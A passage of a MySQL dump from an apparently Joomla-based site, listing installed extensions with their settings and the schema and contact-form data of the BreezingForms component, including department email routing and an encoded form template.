Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2018 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.0\",\"description\":\"PLG_ADMINTOOLSACTIONLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"admintoolsactionlog\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10094,10018,'PLG_SYSTEM_AKEEBAACTIONLOG','plugin','akeebaactionlog','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_AKEEBAACTIONLOG\",\"type\":\"plugin\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.4.2\",\"description\":\"PLG_AKEEBAACTIONLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebaactionlog\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10095,0,'JMap','component','com_jmap','',1,1,0,0,'{\"name\":\"JMap\",\"type\":\"component\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2016 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"4.5\",\"description\":\"COM_JMAP_INFO_MESSAGES\",\"group\":\"\",\"filename\":\"jmap\"}','{\"show_title\":\"1\",\"title_type\":\"maintitle\",\"defaulttitle\":\"\",\"headerlevel\":\"1\",\"classdiv\":\"sitemap\",\"show_pagebreaks\":\"0\",\"opentarget\":\"_self\",\"include_external_links\":\"1\",\"unique_pagination\":\"1\",\"registration_email\":\"\",\"custom_404_page_status\":\"0\",\"custom_404_page_override\":\"1\",\"custom_404_page_mode\":\"html\",\"custom_404_process_content_plugins\":\"0\",\"custom_404_page_text\":\"Sorry, this page is not available!\",\"sitemap_html_template\":\"\",\"show_icons\":\"1\",\"animated\":\"1\",\"animate_speed\":\"200\",\"minheight_root_folders\":\"35\",\"minheight_sub_folders\":\"30\",\"minheight_leaf\":\"20\",\"minwidth_columns\":\"120\",\"font_size_boxes\":\"12\",\"root_folders_color\":\"#F60\",\"root_folders_border_color\":\"#943B00\",\"root_folders_text_color\":\"#FFF\",\"sub_folders_color\":\"#99CDFF\",\"sub_folders_border_color\":\"#11416F\",\"sub_folders_text_color\":\"#11416F\",\"leaf_folders_color\":\"#EBEBEB\",\"leaf_folders_border_color\":\"#6E6E6E\",\"leaf_folders_text_color\":\"#505050\",\"connections_color\":\"#CCC\",\"expand_iconset\":\"square-blue\",\"draggable_sitemap\":\"0\",\"template_override\":\"0\",\"treeview_scripts\":\"1\",\"show_expanded\":\"0\",\"expand_location\":\"location\",\"column_sitemap\":\"0\",\"column_maxnum\":\"3\",\"multilevel_categories\":\"0\",\"hide_empty_cats\":\"0\",\"expand_first_level\":\"0\",\"merge_alias_menu\":\"0\",\"show_toggler\":\"0\",\"enable_view_cache\":\"0\",\"lifetime_view_cache\":\"1\",\"rss_lifetime_view_cache\":\"60\",\"enable_precaching\":\"0\",\"precaching_limit_xml\":\"5000\",\"precaching_limit_images\":\"50\",\"split_sitemap\":\"0\",\"split_chunks\":\"50000\",\"splitting_hardcoded_rootnode\":\"1\",\"gnews_publication_name\":\"\",\"gnews_limit_recent\":\"0\",\"gnews_limit_valid_days\":\"2\",\"gnews_genres\":[\"Blog\"],\"imagetitle_processor\":\"title|alt\",\"max_images_requests\":\"50\",\"regex_images_crawler\":\"advanced\",\"fake_images_processor\":\"0\",\"lazyload_images_processor\":\"0\",\"custom_images_processor\":\"0\",\"custom_images_processor_tags\":\"\",\"custom_images_processor_attributes\":\"\",\"include_description_only\":\"0\",\"sh404sef_multilanguage\":\"0\",\"images_global_filter_include\":\"\",\"images_global_filter_exclude\":\"\",\"videos_global_filter_include\":\"\",\"videos_global_filter_exclude\":\"\",\"cdn_protocol\":\"\",\"rss_channel_name\":\"\",\"rss_channel_description\":\"\",\"rss_channel_image\":\"\",\"rss_webmaster_name\":\"\",\"rss_webmaster_email\":\"\",\"rss_channel_excludewords\":\"\",\"rss_limit_valid_days\":\"\",\"rss_limit_recent\":\"\",\"rss_process_content_plugins\":\"0\",\"rss_include_images\":\"0\",\"geositemap_enabled\":\"0\",\"geositemap_address\":\"\",\"geositemap_name\":\"\",\"geositemap_author\":\"\",\"geositemap_description\":\"\",\"amp_sitemap_enabled\":\"0\",\"amp_suffix\":\"amp\",\"amp_sef_suffix_enabled\":\"0\",\"include_archived\":\"0\",\"multiple_content_sources\":\"0\",\"enable_articles_exclusions\":\"1\",\"disable_acl\":\"enabled\",\"showalways_language_dropdown\":\"\",\"lists_limit_pagination\":\"10\",\"selectable_limit_pagination\":\"10\",\"seostats_custom_link\":\"\",\"seostats_enabled\":\"1\",\"seostats_site_query\":\"1\",\"seostats_gethost\":\"1\",\"linksanalyzer_workingmode\":\"1\",\"linksanalyzer_validation_analysis\":\"2\",\"linksanalyzer_indexing_analysis\":\"1\",\"linksanalyzer_indexing_engine\":\"webcrawler\",\"linksanalyzer_serp_numresults\":\"10\",\"linksanalyzer_remove_separators\":\"1\",\"linksanalyzer_remove_slashes\":\"2\",\"seospider_crawler_delay\":\"0\",\"metainfo_urldecode\":\"1\",\"metainfo_ogtags\":\"1\",\"metainfo_twitter_card_enable\":\"0\",\"metainfo_twitter_card_site\":\"\",\"metainfo_twitter_card_creator\":\"\",\"default_autoping\":\"0\",\"autoping\":\"0\",\"sitemap_links_sef\":\"0\",\"sitemap_links_forceformat\":\"0\",\"sitemap_links_random\":\"0\",\"append_livesite\":\"1\",\"custom_sitemap_domain\":\"\",\"custom_http_port\":\"\",\"resources_limit_management\":\"1\",\"remove_sitemap_serp\":\"0\",\"remove_home_slash\":\"0\",\"advanced_multilanguage\":\"0\",\"socket_mode\":\"dns\",\"force_crawler_http\":\"0\",\"site_itemid\":\"\",\"robots_joomla_subfolder\":\"0\",\"disable_version_checker\":\"0\",\"includejquery\":\"1\",\"enable_debug\":\"0\",\"ga_domain\":\"\",\"wm_domain\":\"\",\"ga_num_results\":\"24\",\"ga_api_key\":\"\",\"ga_client_id\":\"\",\"ga_client_secret\":\"\",\"inject_gajs\":\"0\",\"gajs_code\":\"\",\"inject_gajs_location\":\"body\",\"inject_gajs_version\":\"analytics\",\"gajs_anonymize\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10096,0,'System - JSitemap utilities','plugin','jmap','system',0,1,1,0,'{\"name\":\"System - JSitemap utilities\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2016 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"4.5\",\"description\":\"JSitemap utilities plugin\",\"group\":\"\",\"filename\":\"jmap\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(10097,0,'Content - JSitemap Pingomatic','plugin','pingomatic','content',0,1,1,0,'{\"name\":\"Content - JSitemap Pingomatic\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2016 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"4.5\",\"description\":\"JSitemap Pingomatic plugin\",\"group\":\"\",\"filename\":\"pingomatic\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10098,0,'JSitemap module','module','mod_jmap','',0,1,0,0,'{\"name\":\"JSitemap module\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2016 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"4.5\",\"description\":\"JSitemap Module\",\"group\":\"\",\"filename\":\"mod_jmap\"}','{\"scrolling\":\"auto\",\"width\":\"100%\",\"height\":\"200\",\"height_auto\":\"1\",\"sitemap_html_template\":\"\",\"show_icons\":\"\",\"show_expanded\":\"\",\"expand_location\":\"\",\"column_sitemap\":\"\",\"column_maxnum\":\"\",\"multilevel_categories\":\"\",\"legacy_routing\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10099,0,'JSitemap Quickicons','module','mod_jmapquickicon','',1,1,2,0,'{\"name\":\"JSitemap Quickicons\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2016 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"4.5\",\"description\":\"JSitemap Quickicons module\",\"group\":\"\",\"filename\":\"mod_jmapquickicon\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10100,0,'Google Tag Manager','plugin','googletagmanager','system',0,1,1,0,'{\"name\":\"Google Tag Manager\",\"type\":\"plugin\",\"creationDate\":\"March 2015\",\"author\":\"James Murphy\\/Hugh Gideon-Murphy - Tools for Joomla Shop\",\"copyright\":\"Copyright (C) 2015. All rights reserved.\",\"authorEmail\":\"info@toolsforjoomla.com\",\"authorUrl\":\"www.toolsforjoomla.com\",\"version\":\"1.0.1\",\"description\":\"PLG_GOOGLETAGMANAGER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"googletagmanager\"}','{\"container_id\":\"GTM-WLCMTQP\",\"add_datalayer\":\"on\",\"datalayer_name\":\"dataLayer\",\"track_userLogin\":\"on\",\"trackadmin\":\"off\",\"add_scrolltracker\":\"off\",\"scroll_tracker_content_id\":\"page-item\"}','','',0,'0000-00-00 00:00:00',0,0),(10107,0,'CookieHint and Consent','plugin','cookiehint','system',0,1,1,0,'{\"name\":\"CookieHint and Consent\",\"type\":\"plugin\",\"creationDate\":\"27.07.2015\",\"author\":\"reDim GmbH\",\"copyright\":\"reDim GmbH\",\"authorEmail\":\"team@reDim.de\",\"authorUrl\":\"http:\\/\\/www.redim.de\",\"version\":\"1.3.23\",\"description\":\"PLG_SYSTEM_COOKIEHINT_DESCRIPTION\",\"group\":\"\",\"filename\":\"cookiehint\"}','{\"infourl\":{\"en-GB\":\"\"},\"imprinturl\":{\"en-GB\":\"\"},\"refusal\":\"1\",\"refusalurl\":\"https:\\/\\/www.cookieinfo.org\\/\",\"cookieblocker\":\"0\",\"csp\":\"default-src \'self\' \'unsafe-inline\'\",\"cookiemode\":\"0\",\"cookieexpires\":\"21\",\"position\":\"bottom\",\"css\":\"redimstyle.css\",\"file\":\"redimstyle.php\"}','','',309,'2022-06-28 12:55:20',0,0);
/*!40000 ALTER TABLE `vzx9b_extensions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_compmenus`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_compmenus`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_compmenus` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`package` varchar(30) NOT NULL DEFAULT '',
`parent` int(11) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`img` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`page` int(11) NOT NULL DEFAULT 1,
`frame` tinyint(1) NOT NULL DEFAULT 0,
`border` tinyint(1) NOT NULL DEFAULT 0,
`params` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_compmenus`
--
LOCK TABLES `vzx9b_facileforms_compmenus` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_compmenus` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_facileforms_compmenus` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_config`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_config`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_config` (
`id` varchar(30) NOT NULL DEFAULT '',
`value` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_config`
--
LOCK TABLES `vzx9b_facileforms_config` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_config` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_config` VALUES ('archived','0'),('arealarge','20'),('areamedium','12'),('areasmall','4'),('cellnewline','1'),('compress','1'),('csvdelimiter',';'),('csvquote','\"'),('disable_ip','0'),('emailadr','bevan@webspring.co.za'),('enable_classic','0'),('exported','0'),('formname',''),('formpkg','QuickModeForms'),('getprovider','0'),('gridcolor1','#e0e0ff'),('gridcolor2','#ffe0e0'),('gridshow','1'),('gridsize','10'),('images','{mossite}/components/com_breezingforms/images'),('limitdesc','100'),('livesite','0'),('menupkg',''),('movepixels','10'),('piecepkg',''),('scriptpkg',''),('stylesheet','1'),('uploads','{mospath}/media/breezingforms/uploads'),('viewed','0'),('wysiwyg','0');
/*!40000 ALTER TABLE `vzx9b_facileforms_config` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_elements`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_elements`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_elements` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`form` int(11) NOT NULL DEFAULT 0,
`page` int(11) NOT NULL DEFAULT 1,
`ordering` int(11) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`name` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`type` varchar(50) NOT NULL DEFAULT '',
`class1` varchar(30) DEFAULT NULL,
`class2` varchar(30) DEFAULT NULL,
`logging` tinyint(1) NOT NULL DEFAULT 1,
`posx` int(11) DEFAULT NULL,
`posxmode` tinyint(1) NOT NULL DEFAULT 0,
`posy` int(11) DEFAULT NULL,
`posymode` tinyint(1) NOT NULL DEFAULT 0,
`width` int(11) DEFAULT NULL,
`widthmode` tinyint(1) NOT NULL DEFAULT 0,
`height` int(11) DEFAULT NULL,
`heightmode` tinyint(1) NOT NULL DEFAULT 0,
`flag1` tinyint(1) NOT NULL DEFAULT 0,
`flag2` tinyint(1) NOT NULL DEFAULT 0,
`data1` text DEFAULT NULL,
`data2` text DEFAULT NULL,
`data3` text DEFAULT NULL,
`script1cond` tinyint(1) NOT NULL DEFAULT 0,
`script1id` int(11) DEFAULT NULL,
`script1code` text DEFAULT NULL,
`script1flag1` tinyint(1) NOT NULL DEFAULT 0,
`script1flag2` tinyint(1) NOT NULL DEFAULT 0,
`script2cond` tinyint(1) NOT NULL DEFAULT 0,
`script2id` int(11) DEFAULT NULL,
`script2code` text DEFAULT NULL,
`script2flag1` tinyint(1) NOT NULL DEFAULT 0,
`script2flag2` tinyint(1) NOT NULL DEFAULT 0,
`script2flag3` tinyint(1) NOT NULL DEFAULT 0,
`script2flag4` tinyint(1) NOT NULL DEFAULT 0,
`script2flag5` tinyint(1) NOT NULL DEFAULT 0,
`script3cond` tinyint(1) NOT NULL DEFAULT 0,
`script3id` int(11) DEFAULT NULL,
`script3code` text DEFAULT NULL,
`script3msg` text DEFAULT NULL,
`mailback` tinyint(1) NOT NULL DEFAULT 0,
`mailbackfile` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=125 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_elements`
--
LOCK TABLES `vzx9b_facileforms_elements` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_elements` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_elements` VALUES (5,1,1,1,1,'NAME','Name','Text','','',1,0,0,0,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,1,44,'','Please fill in your name.',0,''),(6,1,1,3,1,'DEPARTMENT','Department','Select List','','',1,0,0,80,0,20,0,20,0,0,0,'1','0;Please select a department;\n0;General Enquiry;shirley@smithandsmith.co.za\n0;Appointments;shirley@smithandsmith.co.za\n0;Short term Insurance;shirley@smithandsmith.co.za\n0;Healthcare;shirley@smithandsmith.co.za\n0;Financial Planning;shirley@smithandsmith.co.za\n0;Other;bevan@webspring.co.za','',0,8,'',0,0,0,16,'',0,0,0,0,0,1,44,'','Please select a department from the dropdown list.',1,''),(28,1,1,2,1,'EMAIL','Email','Text','','',1,0,0,40,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,1,42,'','Please provide us with your email address.',1,''),(33,1,1,4,1,'MESSAGE','Message','Textarea','','',1,0,0,120,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(50,1,1,0,1,'bfFakeName','bfFakeTitle','','','',0,0,0,160,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,41,'',0,0,0,0,0,0,0,'','',0,''),(51,1,1,0,1,'bfFakeName2','bfFakeTitle2','','','',0,0,0,200,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,23,'',0,0,0,0,0,0,0,'','',0,''),(52,1,1,0,1,'bfFakeName3','bfFakeTitle3','','','',0,0,0,240,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,40,'',0,0,0,0,0,0,0,'','',0,''),(53,1,1,0,1,'bfFakeName4','bfFakeTitle4','','','',0,0,0,280,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,38,'',0,0,0,0,0,0,0,'','',0,''),(58,2,1,1,1,'NAME','Name','Text','','',1,0,0,0,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,1,44,'','',0,''),(59,2,1,2,1,'CONTACTNUMBER','Contact Number','Text','','',1,0,0,40,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(64,2,1,3,1,'EMAIL','Email','Text','','',1,0,0,80,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,1,42,'','',1,''),(69,2,1,5,1,'COMMENT','Comment','Textarea','','',1,0,0,160,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(74,2,1,4,1,'DEPARTMENT','Department','Select List','','',1,0,0,120,0,20,0,20,0,0,0,'1','0;Please Select;\n0;General;General\n0;Appointments;Appointments\n0;Short Term Insurance;Short Term Insurance\n0;Healthcare;Healthcare\n0;Financial Planning;Financial Planning','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(116,2,1,6,1,'RECAPTCHA','Spam Check','ReCaptcha','','',0,0,0,200,0,20,0,20,0,0,0,'','','',0,0,'',0,0,0,0,'',0,0,0,0,0,0,0,'','',0,''),(121,2,1,0,1,'bfFakeName','bfFakeTitle','','','',0,0,0,240,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,41,'',0,0,0,0,0,0,0,'','',0,''),(122,2,1,0,1,'bfFakeName2','bfFakeTitle2','','','',0,0,0,280,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,23,'',0,0,0,0,0,0,0,'','',0,''),(123,2,1,0,1,'bfFakeName3','bfFakeTitle3','','','',0,0,0,320,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,40,'',0,0,0,0,0,0,0,'','',0,''),(124,2,1,0,1,'bfFakeName4','bfFakeTitle4','','','',0,0,0,360,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,38,'',0,0,0,0,0,0,0,'','',0,'');
/*!40000 ALTER TABLE `vzx9b_facileforms_elements` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_forms`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_forms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_forms` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`alt_mailfrom` text DEFAULT NULL,
`alt_fromname` text DEFAULT NULL,
`mb_alt_mailfrom` text DEFAULT NULL,
`mb_alt_fromname` text DEFAULT NULL,
`mailchimp_email_field` varchar(255) NOT NULL DEFAULT '',
`mailchimp_checkbox_field` varchar(255) NOT NULL DEFAULT '',
`mailchimp_api_key` varchar(255) NOT NULL DEFAULT '',
`mailchimp_list_id` varchar(255) NOT NULL DEFAULT '',
`mailchimp_double_optin` tinyint(1) NOT NULL DEFAULT 1,
`mailchimp_mergevars` text DEFAULT NULL,
`mailchimp_text_html_mobile_field` varchar(255) NOT NULL DEFAULT '',
`mailchimp_send_errors` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_update_existing` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_replace_interests` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_send_welcome` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_default_type` varchar(255) NOT NULL DEFAULT 'text',
`mailchimp_delete_member` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_send_goodbye` tinyint(1) NOT NULL DEFAULT 1,
`mailchimp_send_notify` tinyint(1) NOT NULL DEFAULT 1,
`mailchimp_unsubscribe_field` varchar(255) NOT NULL DEFAULT '',
`salesforce_token` varchar(255) NOT NULL DEFAULT '',
`salesforce_username` varchar(255) NOT NULL DEFAULT '',
`salesforce_password` varchar(255) NOT NULL DEFAULT '',
`salesforce_type` varchar(255) NOT NULL DEFAULT '',
`salesforce_fields` text DEFAULT NULL,
`salesforce_enabled` tinyint(1) NOT NULL DEFAULT 0,
`dropbox_email` varchar(255) NOT NULL DEFAULT '',
`dropbox_password` varchar(255) NOT NULL DEFAULT '',
`dropbox_folder` text DEFAULT NULL,
`dropbox_submission_enabled` tinyint(1) NOT NULL DEFAULT 0,
`dropbox_submission_types` varchar(255) NOT NULL DEFAULT 'pdf',
`tags_content` text NOT NULL,
`tags_content_template` mediumtext NOT NULL,
`tags_content_template_default_element` int(11) NOT NULL DEFAULT 0,
`tags_form` text NOT NULL,
`tags_content_default_category` int(11) NOT NULL DEFAULT 0,
`tags_content_default_state` int(11) NOT NULL DEFAULT 1,
`tags_content_default_access` int(11) NOT NULL DEFAULT 1,
`tags_content_default_language` varchar(7) NOT NULL DEFAULT '*',
`tags_content_default_featured` int(11) NOT NULL DEFAULT 0,
`tags_content_default_publishup` varchar(255) NOT NULL DEFAULT '0000-00-00 00:00:00',
`tags_content_default_publishdown` varchar(255) NOT NULL DEFAULT '0000-00-00 00:00:00',
`autoheight` tinyint(1) NOT NULL DEFAULT 0,
`package` varchar(30) NOT NULL DEFAULT '',
`template_code` longtext NOT NULL,
`template_code_processed` longtext NOT NULL,
`template_areas` longtext NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`runmode` tinyint(1) NOT NULL DEFAULT 0,
`name` varchar(255) NOT NULL DEFAULT '',
`custom_mail_subject` varchar(255) NOT NULL DEFAULT '',
`mb_custom_mail_subject` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`description` text DEFAULT NULL,
`class1` varchar(30) DEFAULT NULL,
`class2` varchar(30) DEFAULT NULL,
`width` int(11) NOT NULL DEFAULT 0,
`widthmode` tinyint(1) NOT NULL DEFAULT 0,
`height` int(11) NOT NULL DEFAULT 0,
`heightmode` tinyint(1) NOT NULL DEFAULT 0,
`pages` int(11) NOT NULL DEFAULT 1,
`emailntf` tinyint(1) NOT NULL DEFAULT 1,
`mb_emailntf` tinyint(1) NOT NULL DEFAULT 1,
`emaillog` tinyint(1) NOT NULL DEFAULT 1,
`mb_emaillog` tinyint(1) NOT NULL DEFAULT 1,
`emailxml` tinyint(1) NOT NULL DEFAULT 0,
`mb_emailxml` tinyint(1) NOT NULL DEFAULT 0,
`email_type` tinyint(1) NOT NULL DEFAULT 0,
`mb_email_type` tinyint(1) NOT NULL DEFAULT 0,
`email_custom_template` text DEFAULT NULL,
`mb_email_custom_template` text DEFAULT NULL,
`email_custom_html` tinyint(1) NOT NULL DEFAULT 0,
`mb_email_custom_html` tinyint(1) NOT NULL DEFAULT 0,
`emailadr` text DEFAULT NULL,
`dblog` tinyint(1) NOT NULL DEFAULT 1,
`script1cond` tinyint(1) NOT NULL DEFAULT 0,
`script1id` int(11) DEFAULT NULL,
`script1code` text DEFAULT NULL,
`script2cond` tinyint(1) NOT NULL DEFAULT 0,
`script2id` int(11) DEFAULT NULL,
`script2code` text DEFAULT NULL,
`piece1cond` tinyint(1) NOT NULL DEFAULT 0,
`piece1id` int(11) DEFAULT NULL,
`piece1code` text DEFAULT NULL,
`piece2cond` tinyint(1) NOT NULL DEFAULT 0,
`piece2id` int(11) DEFAULT NULL,
`piece2code` text DEFAULT NULL,
`piece3cond` tinyint(1) NOT NULL DEFAULT 0,
`piece3id` int(11) DEFAULT NULL,
`piece3code` text DEFAULT NULL,
`piece4cond` tinyint(1) NOT NULL DEFAULT 0,
`piece4id` int(11) DEFAULT NULL,
`piece4code` text DEFAULT NULL,
`prevmode` tinyint(1) NOT NULL DEFAULT 2,
`prevwidth` int(11) DEFAULT NULL,
`filter_state` text NOT NULL,
`double_opt` tinyint(1) NOT NULL DEFAULT 0,
`opt_mail` varchar(128) NOT NULL DEFAULT '',
`honeypot_settings` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_forms`
--
LOCK TABLES `vzx9b_facileforms_forms` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_forms` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_forms` VALUES (1,'','','','','','','','',1,'','',0,0,0,0,'text',0,1,1,'','','','','',NULL,0,'','','',0,'pdf','','',0,'',1,1,1,'*',0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,'QuickModeForms','eyJhdHRyaWJ1dGVzIjp7ImNsYXNzIjoiYmZRdWlja01vZGVSb290Q2xhc3MiLCJpZCI6ImJmUXVpY2tNb2RlUm9vdCIsIm1kYXRhIjoie1widHlwZVwiOiBcInJvb3RcIn0ifSwicHJvcGVydGllcyI6eyJ0eXBlIjoicm9vdCIsInRpdGxlIjoiQ29udGFjdCIsIm5hbWUiOiJDb250YWN0Iiwicm9sbG92ZXIiOnRydWUsInJvbGxvdmVyQ29sb3IiOiIjZmZjIiwidG9nZ2xlRmllbGRzIjoiIiwiZGVzY3JpcHRpb24iOiIiLCJtYWlsTm90aWZpY2F0aW9uIjoiIiwibWFpbFJlY2lwaWVudCI6IiIsInN1Ym1pdEluY2x1ZGUiOnRydWUsInN1Ym1pdExhYmVsIjoic3VibWl0IiwiY2FuY2VsSW5jbHVkZSI6ZmFsc2UsImNhbmNlbExhYmVsIjoicmVzZXQiLCJwYWdpbmdJbmNsdWRlIjp0cnVlLCJwYWdpbmdOZXh0TGFiZWwiOiJuZXh0IiwicGFnaW5nUHJldkxhYmVsIjoiYmFjayIsInRoZW1lIjoiZGVmYXVsdCIsInRoZW1lYm9vdHN0cmFwIjoiIiwidGhlbWVib290c3RyYXBiZWZvcmUiOiIiLCJ0aGVtZWJvb3RzdHJhcExhYmVsVG9wIjpmYWxzZSwidGhlbWVib290c3RyYXBUaGVtZUVuZ2luZSI6ImJvb3RzdHJhcCIsInRoZW1lYm9vdHN0cmFwVXNlSGVyb1VuaXQiOmZhbHNlLCJ0aGVtZWJvb3RzdHJhcFVzZVdlbGwiOmZhbHNlLCJ0aGVtZWJvb3RzdHJhcFVzZVByb2dyZXNzIjpmYWxzZSwidGhlbWV1c2Vib290c3RyYXBsZWdhY3kiOmZhbHNlLCJmYWRlSW4iOmZhbHNlLCJsYXN0UGFnZVRoYW5rWW91Ijp0cnVlLCJzdWJtaXR0ZWRTY3JpcHRDb25kaWR0aW9uIjoyLCJzdWJtaXR0ZWRTY3JpcHRDb2RlIjoiZnVuY3Rpb24gZmZfQ29udGFjdF9zdWJtaXR0ZWQoc3RhdHVzLCBtZXNzYWdlKXtpZihzdGF0dXM9PTApe2ZmX3N3aXRjaHBhZ2UoMik7fWVsc2V7YWxlcnQobWVzc2FnZSk7fX0iLCJ1c2VFcnJvckFsZXJ0cyI6ZmFsc2UsInVzZURlZmF1bHRFcnJvcnMiOnRydWUsInVzZUJhbGxvb25FcnJvcnMiOmZhbHNlLCJkaXNhYmxlSlF1ZXJ5IjpmYWxzZSwiam9vbWxhSGludCI6ZmFsc2UsIm1vYmlsZUVuYWJsZWQiOmZhbHNlLCJmb3JjZU1vYmlsZSI6ZmF